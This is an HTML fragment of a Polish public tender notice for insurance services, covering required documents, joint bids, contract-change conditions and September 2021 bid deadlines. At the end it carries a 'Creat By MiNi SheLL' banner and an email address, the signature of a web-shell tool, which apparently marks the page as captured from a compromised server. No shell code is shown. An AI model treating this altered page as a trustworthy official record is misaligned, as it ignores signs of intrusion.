o którym mowa w ust. 1 pkt 2) lub złożony przedmiotowy środek dowodowy będzie niekompletny, Zamawiający wezwie Wykonawcę do jego złożenia lub uzupełnienia w wyznaczonym terminie, chyba, że pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>5.	Deklaracja fakultatywnych warunków ubezpieczenia służy potwierdzeniu zgodności z cechami i kryteriami określonymi w opisie kryteriów oceny ofert i nie może być uzupełniana po terminie składania ofert. Jeżeli Wykonawca nie złoży przedmiotowego środka dowodowego w postaci Załącznika nr 4, Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 226 ust. 1 pkt 1 lit. c) w zw. z art. 107 ust. 1 i 3 ustawy PZP. W przypadku, gdy treść Załącznika jest niezgodna z warunkami zamówienia, Oferta będzie podlegała odrzuceniu na podstawie art. 226 ust. 1 pkt. 5 ustawy PZP.<br/>6.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz cenowy (Załącznik nr 1A SWZ). Zamawiający zwraca uwagę, że wraz z ofertą<br/>Wykonawca zobowiązany jest do dołączenia do oferty Formularza cenowego w postaci<br/>Załącznika nr 1A do SWZ. Załącznik nr 1A do SWZ stanowi treść oferty i nie podlega<br/>uzupełnieniu 2. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego<br/>reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru.<br/>3. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 3.1., jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>4. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w pkt 2, Zamawiający żąda od Wykonawcy<br/>pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania<br/>Wykonawcy.<br/>5. Zapisy zawarte w pkt 4 stosuje się odpowiednio do osoby działającej w imieniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>6. Zapisy zawarte w pkt 2-4 stosuje się odpowiednio do osoby działającej w imieniu<br/>podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach.<br/>7. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy (zgodnie z Rozdz. XII ust. 2 i 3 SWZ) –<br/>Załącznik nr 3 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać:<br/>a.	wskazanie postępowania o zamówienie publiczne, którego dotyczy, <br/>b.	Wykonawców ubiegających się wspólnie o udzielenie zamówienia,<br/>c.	ustanowionego pełnomocnika oraz <br/>d.	zakres jego umocowania, a także<br/>e.	oświadczenie o przyjęciu wspólnej solidarnej odpowiedzialności za wykonanie lub nienależyte wykonanie zamówienia. <br/>3.	Jeżeli oferta Wykonawców wspólnie ubiegających się o zamówienie zostanie wybrana jako najkorzystniejsza, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej współpracę tych Wykonawców. <br/>4.	Wspólnicy spółki cywilnej są traktowani jak Wykonawcy składający ofertę wspólną i mają do nich zastosowanie zasady określone w niniejszym Rozdziale. Spółka cywilna ubiegająca się <br/>o zamówienie musi wyznaczyć pełnomocnika do jej reprezentowania. Ustawowe zasady reprezentacji spółki cywilnej zezwalające każdemu wspólnikowi na jej reprezentowanie w takich granicach, w jakich jest uprawniony do prowadzenia jej spraw, nie spełniają bowiem wymogu <br/>z art. 58 ust. 2 ustawy PZP. W przypadku spółki cywilnej art. 58 ust. 2 ustawy PZP nie będzie miał zastosowania, jeżeli oferta zostanie sporządzona w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez wszystkich wspólników spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Każda zmiana Umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności. <br/>2.	Możliwość zmian Umowy istnieje w razie:<br/>2.1.	nadzwyczajnej zmiany stosunków, określonej w art. 3571 kodeksu cywilnego,<br/>2.2.	zmiany powszechnie obowiązujących przepisów prawa,<br/>2.3.	zmiany organizacyjnej Zamawiającego istotnej dla realizacji niniejszej umowy.<br/>3.	Dodatkowo dopuszcza się:<br/>3.1.	zmiany dotyczące terminów płatności, wysokości i liczby rat składki; w przypadku czasowego braku środków na zapłatę składek przez Zamawiającego w terminie przewidzianym w umowie oraz dokumentach ubezpieczenia, bez dodatkowej zwyżki wysokości składki przy rozłożeniu jej na raty,<br/>3.2.	zmiany wysokości składki lub raty składki w przypadku zmiany sumy ubezpieczenia; w przypadku zmiany wartości majątku,<br/>3.3.	rozszerzenie zakresu ubezpieczenia na wniosek Zamawiającego i za zgodą Wykonawcy; w przypadku ujawnienia się bądź powstania nowego ryzyka ubezpieczeniowego, nie przewidzianego wcześniej w specyfikacji,<br/>3.4.	korzystne dla Zamawiającego zmiany zakresu ubezpieczenia wynikające ze zmian OWU Wykonawcy za zgodą Zamawiającego i Wykonawcy;<br/>4.	Zamawiający wskazuje, iż zakres dopuszczalnych zmian będzie odpowiadał zakresowi, w jakim warunki (okoliczności) określone w ust. 2 i 3 będą pozostawały w adekwatnym związku przyczynowo - skutkowym.<br/>5.	W żadnym przypadku postanowień niniejszej klauzuli nie należy interpretować jako udzielenie zgody na dowolne roszczenie stron do żądania zmiany umowy, a jedynie możliwość dokonania zmiany Umowy. Każda zmiana umowy wymaga zgody drugiej Strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zgok-olsztyn.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-22 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Niniejszy formularz nie przewiduje sytuacji, w której niektóre przedmiotowe środki dowodowe mogą być uzupełnione na wezwanie a niektóre nie. Zamawiający mógł zatem zaznaczyć tylko jedną opcję. Opis wymagań zawarty jest w sekcji dot. przedmiotowych środków dowodowych.<br/>1. Zamawiający nie dopuszcza złożenia ofert wariantowych.<br/>2. Zamawiający nie stawia wymagań w zakresie zatrudnienia na podstawie stosunku pracy.<br/>3. Zamawiający nie stawia wymagań w zakresie zatrudnienia osób, o których mowa w art. 96<br/>ust. 2 pkt 2 ustawy PZP.<br/>4. Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie<br/>przez wykonawców, o których mowa w art. 94 ustawy PZP.<br/>5. Zamawiający nie przewiduje rozliczeń z Wykonawcą w walutach obcych.<br/>6. Zamawiający nie dopuszcza złożenia ofert w postaci katalogów elektronicznych ani 7. Zamawiający, zgodnie z art. 121 pkt 1) ustawy PZP zastrzega obowiązek osobistego<br/>wykonania przez Wykonawcę kluczowych części zamówienia, tj. zamówienia w zakresie<br/>ochrony ubezpieczeniowej<br/>8. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com